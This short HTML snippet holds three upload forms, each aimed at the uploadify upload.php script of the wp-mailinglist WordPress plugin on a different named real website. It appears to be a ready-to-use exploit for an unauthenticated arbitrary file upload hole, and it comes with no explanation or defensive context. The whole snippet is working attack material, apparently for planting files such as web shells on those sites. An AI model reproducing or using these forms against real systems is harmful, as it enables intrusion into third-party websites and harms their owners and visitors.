upload web 1 <form method="POST" action="http://www.cdf-raa.coop/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

web 2<form method="POST" action="http://www.placebourassa.com/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

web 3<form method="POST" action="https://weeksparkgolf.com/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>
